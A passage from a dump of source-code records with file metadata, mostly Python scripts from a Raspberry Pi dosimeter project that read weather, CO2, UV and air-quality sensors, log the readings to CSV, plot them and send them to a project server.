unreachable')\n else:\n # consider handling errno.ECONNABORTED errno.ECONNRESET\n self.vprint(\n 1, 'Failed to send packet! Socket error: ' +\n '{}: {}'.format(*e))\n elif e == socket.timeout:\n # TCP\n self.vprint(1, 'Failed to send packet! Socket timeout')\n self.send_to_memory(average_data)\n"
},
{
"alpha_fraction": 0.6254767179489136,
"alphanum_fraction": 0.6559877991676331,
"avg_line_length": 28.795454025268555,
"blob_id": "bede744581a1273ecb7463d6b0f33f4a3c59fc52",
"content_id": "f965ea2ec1927fc8150d1718620be1fa22e2ed56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1311,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 44,
"path": "/weather_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "#!/bin/python\n\nimport time\nimport datetime\nimport csv\nimport sys\nfrom Adafruit_BME280 import *\n\nsys.stdout.flush()\n\nsensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n\nfile_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\nfilename = \"weather_test_results_\"+file_time+\".csv\"\nresults=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n\nlogfilename = \"weather_test_results.csv\"\nlogresults = open(logfilename, \"wb+\", 0)\n\nmetadata=[\"Time\", \"Temp (C)\",\"Pressure (hPa)\", \"Humidity (%)\"]\nresults.writerow(metadata)\nlogresults.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\",\"+metadata[3]+\"\\n\")\n\nwhile True:\n date_time = datetime.datetime.now()\n degrees = sensor.read_temperature()\n pascals = sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = sensor.read_humidity()\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %'.format(humidity))\n\n data=[]\n data.append(date_time)\n data.append(degrees)\n data.append(hectopascals)\n data.append(humidity)\n\n results.writerow(data)\n logresults.write(datetime.datetime.strftime(data[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(data[1])+\",\"+str(data[2])+\",\"+str(data[3])+\"\\n\")\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5859375,
"alphanum_fraction": 0.6374080777168274,
"avg_line_length": 30.536231994628906,
"blob_id": "f4bbf5498b9803ffdef8433db0778c5582bf27e0",
"content_id": "34c182820269a53a066e700c3b7e10bdec77f477",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2176,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 69,
"path": "/adc_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# Simple example of reading the MCP3008 analog input channels and printing\n# them all out.\n# Author: Tony DiCola\n# License: Public Domain\nimport time\nimport datetime\nimport csv\nimport sys\n\n# Import SPI library (for hardware SPI) and MCP3008 library.\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n\nsys.stdout.flush()\n\n# Software SPI configuration:\nCLK = 18\nMISO = 23\nMOSI = 24\nCS = 25\nmcp = Adafruit_MCP3008.MCP3008(clk=CLK, cs=CS, miso=MISO, mosi=MOSI)\n\n# Hardware SPI configuration:\n# SPI_PORT = 0\n# SPI_DEVICE = 0\n# mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\nprint('Reading MCP3008 values, press Ctrl-C to quit...')\n# Print nice channel column headers.\nprint('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*range(8)))\nprint('-' * 57)\n\nfile_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\nfilename = \"CO2_test_results_\"+file_time+\".csv\"\nadc_results = csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n\nlogfilename = \"CO2_test_results.csv\"\nlogresults = open(logfilename, \"wb+\", 0)\n\nmetadata = []\nmetadata.append(\"Date and Time\")\nmetadata.append(\"CO2 (ppm)\")\nmetadata.append(\"UV\")\nadc_results.writerow(metadata[:])\nlogresults.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\"\\n\")\n\n# Main program loop.\nwhile True:\n date_time = datetime.datetime.now()\n # Read all the ADC channel values in a list.\n values = [0]*8\n for i in range(8):\n # The read_adc function will get the value of the specified channel (0-7).\n values[i] = mcp.read_adc(i)\n # Print the ADC values.\n # print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n print('| {0:>4} | {1:>4} |'.format(values[0],values[7]))\n concentration = 5000/496*values[0] - 1250\n print('|{}|'.format(concentration))\n # Pause for half a second.\n uv_index = values[7]\n results = []\n results.append(date_time)\n results.append(concentration)\n results.append(uv_index)\n\n adc_results.writerow(results[:])\n logresults.write(datetime.datetime.strftime(results[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(results[1])+\",\"+str(results[2])+\"\\n\")\n\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5505245923995972,
"alphanum_fraction": 0.5571507215499878,
"avg_line_length": 29.957265853881836,
"blob_id": "098c5288840a3dc046ca1c9fdf559b2d6317ffb8",
"content_id": "3c4f2f628a563627ac0d7c31d4789a26fc21fd52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3622,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 117,
"path": "/weather_test_try.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "from appJar import gui\napp=gui()\nimport os\nimport csv\ndef weather_plot(btn):\n import matplotlib.pyplot as plt\n import dateutil\n import numpy as np\n from matplotlib.dates import DateFormatter\n\n times=[]\n degrees_list=[]\n pressure_list=[]\n humidity_list=[]\n\n file_name=[]\n for filename in os.listdir('.'):\n if filename.endswith(\".csv\"):\n file_name.append(os.path.join('.', filename))\n app.setFont(20)\n app.addOptionBox(\"Files\",file_name)\n \n def ok(btn):\n user_file=app.getOptionBox(\"Files\")\n \n results = csv.reader(open(user_file), delimiter=',')\n row_counter=0\n for r in results:\n if row_counter>0:\n times.append(dateutil.parser.parse(r[0]))\n degrees_list.append(float(r[1]))\n pressure_list.append(float(r[2]))\n humidity_list.append(float(r[3]))\n \n row_counter+=1\n \n temp_ave=[]\n temp_unc = []\n pressure_ave=[]\n pressure_unc=[]\n humidity_ave=[]\n humidity_unc=[]\n merge_times = []\n\n n_merge = 8\n ndata = len(degrees_list)\n nsum_data = int(ndata/n_merge)\n\n for i in range(nsum_data):\n itemp = degrees_list[i*n_merge:(i+1)*n_merge]\n itemp_array = np.asarray(itemp)\n temp_mean = np.mean(itemp_array)\n temp_sigma = np.sqrt(np.var(itemp_array))\n temp_ave.append(temp_mean)\n temp_unc.append(temp_sigma)\n \n for i in range(nsum_data):\n ipressure = pressure_list[i*n_merge:(i+1)*n_merge] \n ipressure_array = np.asarray(ipressure)\n pressure_mean = np.mean(ipressure_array)\n pressure_sigma = np.sqrt(np.var(ipressure_array))\n pressure_ave.append(pressure_mean)\n pressure_unc.append(pressure_sigma)\n \n for i in range(nsum_data):\n ihumid = humidity_list[i*n_merge:(i+1)*n_merge]\n ihumid_array = np.asarray(ihumid)\n humid_mean = np.mean(ihumid_array)\n humid_sigma = np.sqrt(np.var(ihumid_array))\n humidity_ave.append(humid_mean)\n humidity_unc.append(humid_sigma)\n\n for i in range(nsum_data):\n itimes = times[i*n_merge:(i+1)*n_merge]\n itime = itimes[int(len(itimes)/2)]\n merge_times.append(itime)\n\n\n \n \n fig=plt.figure()\n ax=fig.add_subplot(111) \n plt.plot(merge_times, temp_ave, \"b.\")\n plt.errorbar(merge_times, temp_ave, yerr = temp_unc)\n plt.title(\"Temperature\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Temperature(C)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, pressure_ave,\"g.\" )\n plt.errorbar(merge_times, pressure_ave, yerr = pressure_unc)\n plt.title(\"Pressure\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Pressure(hPa)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n\n\n fig=plt.figure()\n ax=fig.add_subplot(111)\n plt.plot(merge_times, humidity_ave,\"r.\" )\n plt.errorbar(merge_times, humidity_ave, yerr = humidity_unc)\n plt.title(\"Humidity\")\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Humidity(%)\")\n fig.autofmt_xdate()\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n plt.show()\n app.addButton(\"OK\",ok)\n app.go()\n\napp.addButton(\"Plot Weather Data\",weather_plot)\napp.go()\n"
},
{
"alpha_fraction": 0.8405796885490417,
"alphanum_fraction": 0.8405796885490417,
"avg_line_length": 33.5,
"blob_id": "d8d1ae6c05d49432208e53cf217a9be2bc012493",
"content_id": "d7f788a53dd62af70396bc8af778e0dcb770f640",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 69,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# dosenet-raspberrypi\nRaspberry Pi specific software for dosimeters.\n"
},
{
"alpha_fraction": 0.5389993190765381,
"alphanum_fraction": 0.5444921851158142,
"avg_line_length": 31.9375,
"blob_id": "7e34046cadbc75d9dfcbcb08375724e2ed468789",
"content_id": "6caec2b405a285fde6d44d2e4c1389e246894a9a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10013,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 304,
"path": "/manager_air-quality.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "import time\nimport argparse\nimport signal\nimport sys\nimport serial\nimport csv\nimport datetime\n\nfrom globalvalues import RPI\nif RPI:\n import RPi.GPIO as GPIO\n\nfrom auxiliaries import Config, PublicKey\nfrom auxiliaries import datetime_from_epoch, set_verbosity\nfrom sender import ServerSender\nfrom data_handler_aq import Data_Handler_AQ\n\nfrom globalvalues import DEFAULT_CONFIG, DEFAULT_PUBLICKEY\nfrom globalvalues import DEFAULT_HOSTNAME, DEFAULT_UDP_PORT, DEFAULT_TCP_PORT\nfrom globalvalues import DEFAULT_SENDER_MODE\nfrom globalvalues import DEFAULT_DATALOG_AQ\nfrom globalvalues import DEFAULT_LOGFILE_AQ\nfrom globalvalues import DEFAULT_INTERVAL_NORMAL_AQ\nfrom globalvalues import DEFAULT_AQ_PORT, AQ_VARIABLES\nfrom globalvalues import DEFAULT_INTERVAL_TEST_AQ\n\ndef signal_term_handler(signal, frame):\n # If SIGTERM signal is intercepted, the SystemExit exception routines\n # get run\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, signal_term_handler)\n\n\nclass Manager_AQ(object):\n\n def __init__(self,\n interval=None,\n sender_mode=DEFAULT_SENDER_MODE,\n verbosity=None,\n log=False,\n logfile=None,\n datalog=None,\n datalogflag=False,\n config=None,\n publickey=None,\n hostname=DEFAULT_HOSTNAME,\n port=None,\n test=None,\n AQ_port=DEFAULT_AQ_PORT,\n variables=AQ_VARIABLES,\n ):\n\n self.interval = interval\n\n self.aq_port = AQ_port\n self.variables = variables\n\n self.datalog = datalog\n self.datalogflag = datalogflag\n\n self.a_flag()\n self.d_flag()\n self.make_data_log(self.datalog)\n\n self.test = test\n\n self.handle_input(\n log, logfile, verbosity, test, interval, config, publickey)\n\n self.data_handler = Data_Handler_AQ(\n manager=self,\n verbosity=self.v,\n logfile=self.logfile,\n variables=self.variables)\n self.sender = ServerSender(\n manager=self,\n mode=sender_mode,\n port=port,\n verbosity=self.v,\n logfile=self.logfile)\n\n self.data_handler.backlog_to_queue()\n\n def a_flag(self):\n \"\"\"\n Checks if the -a from_argparse is called.\n If it is called, sets the path of the data-log to\n DEFAULT_DATALOG_D3S.\n \"\"\"\n if self.datalogflag:\n self.datalog = DEFAULT_DATALOG_AQ\n\n def d_flag(self):\n \"\"\"\n Checks if the -d from_argparse is called.\n If it is called, sets datalogflag to True.\n \"\"\"\n if self.datalog:\n self.datalogflag = True\n\n def make_data_log(self, file):\n if self.datalogflag:\n with open(file, 'a') as f:\n pass\n\n def handle_input(self, log, logfile, verbosity, test, interval,\n config, publickey):\n\n if log and logfile is None:\n logfile = DEFAULT_LOGFILE_AQ\n\n if logfile and not log:\n log = True\n\n if log:\n self.logfile = logfile\n else:\n self.logfile = None\n\n if verbosity is None:\n if test:\n verbosity = 2\n else:\n verbosity = 1\n self.v = verbosity\n set_verbosity(self, logfile=logfile)\n\n if log:\n self.vprint(1, '')\n self.vprint(1, 'Writing to logfile at {}'.format(self.logfile))\n self.running = False\n\n if self.test:\n if interval is None:\n self.vprint(\n 2, \"No interval given, using default for TEST MODE\")\n interval = DEFAULT_INTERVAL_TEST_AQ\n\n if interval is None:\n self.vprint(\n 2, \"No interval given, using interval at 5 minutes\")\n interval = DEFAULT_INTERVAL_NORMAL_AQ\n if config is None:\n self.vprint(2, \"No config file given, \" +\n \"attempting to use default config path\")\n config = DEFAULT_CONFIG\n if publickey is None:\n self.vprint(2, \"No publickey file given, \" +\n \"attempting to use default publickey path\")\n publickey = DEFAULT_PUBLICKEY\n\n self.interval = 
interval\n\n        if config:\n            try:\n                self.config = Config(config,\n                                     verbosity=self.v, logfile=self.logfile)\n            except IOError:\n                raise IOError(\n                    'Unable to open config file {}!'.format(config))\n        else:\n            self.vprint(\n                1, 'WARNING: no config file given. Not posting to server')\n            self.config = None\n\n        if publickey:\n            try:\n                self.publickey = PublicKey(\n                    publickey, verbosity=self.v, logfile=self.logfile)\n            except IOError:\n                raise IOError(\n                    'Unable to load publickey file {}!'.format(publickey))\n        else:\n            self.vprint(\n                1, 'WARNING: no public key given. Not posting to server')\n            self.publickey = None\n\n        self.aes = None #checked in sender, used for the manager_d3s\n\n    def run(self):\n\n        this_start, this_end = self.get_interval(time.time())\n        self.vprint(\n            1, ('Manager is starting to run at {}' +\n                ' with intervals of {}s').format(\n                datetime_from_epoch(this_start), self.interval))\n        self.running = True\n        try:\n            while self.running:\n\n                self.handle_air_counts(this_start, this_end)\n\n                this_start, this_end = self.get_interval(this_end)\n\n        except KeyboardInterrupt:\n            self.vprint(1, '\\nKeyboardInterrupt: stopping Manager run')\n            self.stop()\n            self.takedown()\n        except SystemExit:\n            self.vprint(1, '\\nSystemExit: taking down Manager')\n            self.stop()\n            self.takedown()\n\n    def stop(self):\n        \"\"\"Stop counting time\"\"\"\n        self.running = False\n\n    def get_interval(self, start_time):\n        \"\"\"\n        Return start and end time for interval, based on given start_time.\n        \"\"\"\n        end_time = start_time + self.interval\n        return start_time, end_time\n\n    def data_log(self, file, **kwargs):\n        \"\"\"\n        Writes average_data list to file\n        \"\"\"\n        time_string = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        average_data = kwargs.get('average_data')\n        if self.datalogflag:\n            with open(file, 'a') as f:\n                f.write('{0}, {1}'.format(time_string, average_data))\n                f.write('\\n')\n            self.vprint(2, 'Writing average air quality data to data log at {}'.format(file))\n\n    def handle_air_counts(self, this_start, this_end):\n        \"\"\"\n        Takes air quality data for a given interval and sends\n        a list of data to the data handler\n        \"\"\"\n        aq_data_set = []\n        average_data = []\n        while time.time() < this_end:\n            text = self.aq_port.read(32)\n            buffer = [ord(c) for c in text]\n            # guard against short or empty reads on a serial timeout, which\n            # would make buffer[0] raise an IndexError\n            if len(buffer) == 32 and buffer[0] == 66:\n                summation = sum(buffer[0:30])\n                checkbyte = (buffer[30]<<8)+buffer[31]\n                if summation == checkbyte:\n                    current_second_data = []\n                    buf = buffer[1:32]\n                    current_second_data.append(datetime.datetime.now())\n                    for n in range(1,4):\n                        current_second_data.append(repr(((buf[(2*n)+1]<<8) + buf[(2*n)+2])))\n                    for n in range(1,7):\n                        current_second_data.append(repr(((buf[(2*n)+13]<<8) + buf[(2*n)+14])))\n                    aq_data_set.append(current_second_data)\n        for c in range(len(self.variables)):\n            c_data = []\n            for i in range(len(aq_data_set)):\n                c_data.append(aq_data_set[i][c+1])\n            c_data_int = list(map(int, c_data))\n            # an interval with no valid frames would otherwise divide by zero\n            avg_c = sum(c_data_int)/len(c_data_int) if c_data_int else 0\n            average_data.append(avg_c)\n\n        self.data_handler.main(\n            self.datalog, average_data, this_start, this_end)\n\n    def takedown(self):\n        \"\"\"\n        Sends data to the backlog and shuts\n        down the manager\n        \"\"\"\n        self.data_handler.send_all_to_backlog()\n\n        del(self)\n\n    @classmethod\n    def from_argparse(cls):\n        parser = argparse.ArgumentParser()\n        parser.add_argument('--interval', '-i', type=int, default=None)\n        parser.add_argument(\n            '--sender-mode', '-m', type=str, default=DEFAULT_SENDER_MODE,\n            choices=['udp', 'tcp', 'UDP', 'TCP'])\n        parser.add_argument('--verbosity', '-v', type=int, default=None)\n        parser.add_argument('--log', '-l', action='store_true', default=False)\n        parser.add_argument('--logfile', '-f', type=str, default=None)\n        parser.add_argument('--datalog', '-d', default=None)\n        parser.add_argument(\n            '--datalogflag', '-a', action='store_true', default=False)\n        parser.add_argument('--config', '-c', default=None)\n        parser.add_argument('--publickey', '-k', default=None)\n        parser.add_argument('--hostname', '-s', default=DEFAULT_HOSTNAME)\n        parser.add_argument('--port', '-p', type=int, default=None)\n        parser.add_argument('--test', '-t', action='store_true', default=False)\n\n        args = parser.parse_args()\n        arg_dict = vars(args)\n        mgr = Manager_AQ(**arg_dict)\n\n        return mgr\n\nif __name__ == '__main__':\n    import traceback  # used in the except block below but missing from the original imports\n    mgr = Manager_AQ.from_argparse()\n    try:\n        mgr.run()\n    except:\n        if mgr.logfile:\n            # print exception info to logfile\n            with open(mgr.logfile, 'a') as f:\n                traceback.print_exc(15, f)\n        # regardless, re-raise the error which will print to stderr\n        raise\n"
},
{
"alpha_fraction": 0.5242795944213867,
"alphanum_fraction": 0.5351480841636658,
"avg_line_length": 35.20577621459961,
"blob_id": "59e043b27e43e29b85475ba5a9f94abd19e93003",
"content_id": "d5d7666a4a515aafd1a587b4e7a41f117c01ff6c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10029,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 277,
"path": "/weather_DAQ.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 12 11:32:41 2017\n\n@author: Ludi Cao\n\"\"\"\nimport time\nimport datetime\nimport csv\nfrom Adafruit_BME280 import *\nimport os\nimport numpy as np\nimport dateutil\nfrom matplotlib.dates import DateFormatter\nimport matplotlib.pyplot as plt\nfrom collections import deque\n\nclass weather_DAQ(object):\n def __init__(self, maxdata, n_merge):\n self.sensor = None\n self.running=False\n self.time_queue=deque()\n self.temp_queue=deque()\n self.humid_queue=deque()\n self.press_queue=deque()\n self.temp_err=deque()\n self.humid_err=deque()\n self.press_err=deque()\n self.maxdata=int(maxdata)\n self.n_merge=int(n_merge)\n self.temp_list=[]\n self.humid_list=[]\n self.press_list=[]\n self.time_list=[]\n self.merge_test=False\n self.first_data = True\n self.last_time = None\n\n def close(self,plot_id):\n plt.close(plot_id)\n \n def create_file(self):\n global results\n self.sensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8) \n file_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\n filename = \"/home/pi/data/weather_test_results_\"+file_time+\".csv\"\n results=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n metadata=[\"Time\", \"Temp (C)\",\"Temp SD\",\"Pressure (hPa)\", \"Pressure SD\",\"Humidity (%)\",\"Humidity SD\"]\n results.writerow(metadata)\n\n def start(self):\n global results\n date_time = datetime.datetime.now()\n degrees = self.sensor.read_temperature()\n pascals = self.sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = self.sensor.read_humidity()\n \n data=[]\n\n self.merge_test=False\n self.add_data(self.temp_queue,self.temp_err,self.temp_list,degrees)\n self.add_data(self.humid_queue,self.humid_err,self.humid_list,humidity)\n self.add_data(self.press_queue,self.press_err,self.press_list,hectopascals)\n self.add_time(self.time_queue,self.time_list, date_time)\n \n # data.append(date_time)\n # data.append(degrees)\n # data.append(hectopascals)\n # data.append(humidity)\n \n # results.writerow(data) \n\n if self.first_data and len(self.temp_queue) != 0:\n for i in range(len(self.temp_queue)):\n data = []\n data.append(self.time_queue[i])\n data.append(self.temp_queue[i])\n data.append(self.temp_err[i])\n data.append(self.press_queue[i])\n data.append(self.press_err[i])\n data.append(self.humid_queue[i])\n data.append(self.humid_err[i])\n results.writerow(data)\n\n self.last_time = data[0]\n self.first_data = False\n elif not self.first_data:\n try:\n print(self.last_time)\n if self.time_queue[-1] != self.last_time:\n data = []\n data.append(self.time_queue[-1])\n data.append(self.temp_queue[-1])\n data.append(self.temp_err[-1])\n data.append(self.press_queue[-1])\n data.append(self.press_err[-1])\n data.append(self.humid_queue[-1])\n data.append(self.humid_err[-1])\n results.writerow(data)\n\n self.last_time = self.time_queue[-1]\n else:\n print('duplicated data.')\n except IndexError:\n print('No new data being written.')\n else: \n print('No data acquired yet.')\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %\\n'.format(humidity))\n \n \n def press(self):\n if len(self.time_queue)>0:\n self.update_plot(3,self.time_queue,self.press_queue,self.press_err,\"Time\",\"Pressure(hPa)\",\"Pressure vs. 
time\")\n\n    def temp(self):\n        if len(self.time_queue)>0:\n            self.update_plot(1,self.time_queue,self.temp_queue,self.temp_err,\"Time\",\"Temperature(C)\",\"Temperature vs. time\")\n\n    def humid(self):\n        if len(self.time_queue)>0:\n            self.update_plot(2,self.time_queue,self.humid_queue,self.humid_err,\"Time\",\"Humidity(%)\",\"Humidity vs.time\")\n\n\n    def add_time(self, queue, timelist, data):\n        print('Input time: {}\\n'.format(data))\n        timelist.append(data)\n\n        if len(timelist)>=self.n_merge:\n            self.merge_test=True\n            queue.append(timelist[int((self.n_merge)/2)])\n            print('Queue time: {}\\n'.format(timelist[int((self.n_merge)/2)]))\n            for i in range(len(timelist)):\n                timelist.pop()\n        if len(queue)>self.maxdata:\n            queue.popleft()\n\n    def add_data(self, queue, queue_err,temp_list, data):\n        temp_list.append(data)\n        if len(temp_list)>=self.n_merge:\n            queue.append(np.mean(np.asarray(temp_list)))\n            queue_err.append(np.std(np.asarray(temp_list)))\n            for i in range(len(temp_list)):\n                temp_list.pop()\n        if len(queue)>self.maxdata:\n            queue.popleft()\n\n    def update_plot(self,plot_id,xdata,ydata,yerr,xlabel,ylable,title):\n        plt.ion()\n        fig = plt.figure(plot_id)\n        plt.clf()\n        ax=fig.add_subplot(111)\n        plt.xlabel(xlabel)\n        plt.ylabel(ylable)\n        plt.title(title)\n        plt.plot(xdata,ydata,\"r.\")\n        fig.autofmt_xdate()\n        ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n        ax.errorbar(xdata, ydata, yerr=yerr)\n        fig.show()\n        plt.pause(0.0005)\n\n    def plotdata(self):\n\n        times=[]\n        degrees_list=[]\n        pressure_list=[]\n        humidity_list=[]\n        temp_ave=[]\n        temp_unc = []\n        pressure_ave=[]\n        pressure_unc=[]\n        humidity_ave=[]\n        humidity_unc=[]\n        merge_times = []\n\n        from appJar import gui  # appJar is not imported at module level in this file\n        import dateutil.parser  # ensure the parser submodule used below is loaded\n        app=gui(\"Weather Plot\",\"800x400\")\n        app.addLabel(\"1\",\"Please choose a following .csv file\")\n        file_name=[]\n        for filename in os.listdir('.'):\n            if filename.endswith(\".csv\"):\n                file_name.append(os.path.join('.', filename))\n        app.setFont(20)\n        app.addOptionBox(\"Files\",file_name)\n        app.setOptionBoxHeight(\"Files\",\"4\")\n        app.addLabel(\"2\",\"Enter the number of data points to merge:\")\n        app.setLabelFont(\"20\",\"Helvetica\")\n        app.addNumericEntry(\"n\")\n        app.setFocus(\"n\")\n\n        def ok(btn):\n            user_file=app.getOptionBox(\"Files\")\n            n_merge=int(app.getEntry(\"n\"))\n            row_counter=0\n            results = csv.reader(open(user_file), delimiter=',')\n\n            for r in results:\n                if row_counter>0:\n                    times.append(dateutil.parser.parse(r[0]))\n                    degrees_list.append(float(r[1]))\n                    pressure_list.append(float(r[2]))\n                    humidity_list.append(float(r[3]))\n\n                row_counter+=1\n\n            ndata = int(len(degrees_list))\n            nsum_data = int(ndata/n_merge)\n\n            for i in range(nsum_data):\n                itemp = degrees_list[i*n_merge:(i+1)*n_merge]\n                itemp_array = np.asarray(itemp)\n                temp_mean = np.mean(itemp_array)\n                temp_sigma = np.sqrt(np.var(itemp_array))\n                temp_ave.append(temp_mean)\n                temp_unc.append(temp_sigma)\n\n            for i in range(nsum_data):\n                ipressure = pressure_list[i*n_merge:(i+1)*n_merge]\n                ipressure_array = np.asarray(ipressure)\n                pressure_mean = np.mean(ipressure_array)\n                pressure_sigma = np.sqrt(np.var(ipressure_array))\n                pressure_ave.append(pressure_mean)\n                pressure_unc.append(pressure_sigma)\n\n            for i in range(nsum_data):\n                ihumid = humidity_list[i*n_merge:(i+1)*n_merge]\n                ihumid_array = np.asarray(ihumid)\n                humid_mean = np.mean(ihumid_array)\n                humid_sigma = np.sqrt(np.var(ihumid_array))\n                humidity_ave.append(humid_mean)\n                humidity_unc.append(humid_sigma)\n\n            for i in range(nsum_data):\n                itimes = times[i*n_merge:(i+1)*n_merge]\n                itime = itimes[int(len(itimes)/2)]\n                merge_times.append(itime)\n\n            fig=plt.figure()\n            ax=fig.add_subplot(111)\n            plt.plot(merge_times, temp_ave, \"b.\")\n            plt.errorbar(merge_times, temp_ave, yerr = temp_unc)\n            plt.title(\"Temperature\")\n            plt.xlabel(\"Time(s)\")\n            plt.ylabel(\"Temperature(C)\")\n            fig.autofmt_xdate()\n            ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n            fig=plt.figure()\n            ax=fig.add_subplot(111)\n            plt.plot(merge_times, pressure_ave,\"g.\" )\n            plt.errorbar(merge_times, pressure_ave, yerr = pressure_unc)\n            plt.title(\"Pressure\")\n            plt.xlabel(\"Time(s)\")\n            plt.ylabel(\"Pressure(hPa)\")\n            fig.autofmt_xdate()\n            ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n\n            fig=plt.figure()\n            ax=fig.add_subplot(111)\n            plt.plot(merge_times, humidity_ave,\"r.\" )\n            plt.errorbar(merge_times, humidity_ave, yerr = humidity_unc)\n            plt.title(\"Humidity\")\n            plt.xlabel(\"Time(s)\")\n            plt.ylabel(\"Humidity(%)\")\n            fig.autofmt_xdate()\n            ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n            plt.show()\n\n        app.addButton(\"OK\",ok)\n        app.setButtonWidth(\"OK\",\"20\")\n        app.setButtonHeight(\"OK\",\"4\")\n        app.setButtonFont(\"20\",\"Helvetica\")\n        app.go()\n"
}
] | 10 |
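The dosenet-raspberrypi scripts above (air_quality_test.py and manager_air-quality.py) each parse the same 32-byte serial frame inline: start byte 66 (0x42), big-endian 16-bit data words, and a checksum of the first 30 bytes stored in the last two. A minimal sketch of that parsing factored into one helper, assuming only the frame layout those files show; parse_pms_frame is a hypothetical name, not part of the repository:

def parse_pms_frame(frame):
    # Return (pm_values, particle_counts) or None for an invalid frame.
    buf = [ord(c) for c in frame]            # Python 2: serial.read() returns str
    if len(buf) != 32 or buf[0] != 66:       # 66 == 0x42 start byte
        return None
    if sum(buf[0:30]) != (buf[30] << 8) + buf[31]:
        return None                          # checksum mismatch
    words = [(buf[i] << 8) + buf[i + 1] for i in range(4, 30, 2)]
    pm = words[0:3]        # PM1.0, PM2.5, PM10 concentrations in ug/m3
    counts = words[6:12]   # particles > 0.3/0.5/1.0/2.5/5.0/10 um per 0.1 L
    return pm, counts

Used with the same serial setup as the scripts above, parse_pms_frame(port.read(32)) would replace the repeated bit-shifting blocks with one call per frame.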
moffire/shows_guide
|
https://github.com/moffire/shows_guide
|
11145b3c2ffc9d1ca13c28bb4bb80ff7dda82676
|
200c768bd4fe975ea25797f7285415c328dfdb6e
|
f31eaf5366a6740fb40820d0069dd16e7e5bda93
|
refs/heads/master
| 2023-03-05T14:35:46.457768 | 2021-02-20T18:16:07 | 2021-02-20T18:16:07 | 296,393,328 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6752577424049377,
"alphanum_fraction": 0.6752577424049377,
"avg_line_length": 34.272727966308594,
"blob_id": "5c88bd3eba6e69bd8f367124cd810343e2089c8e",
"content_id": "4d01b042ba9b6a4d94607142b7d95ee0d15b5aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 11,
"path": "/shows/urls.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
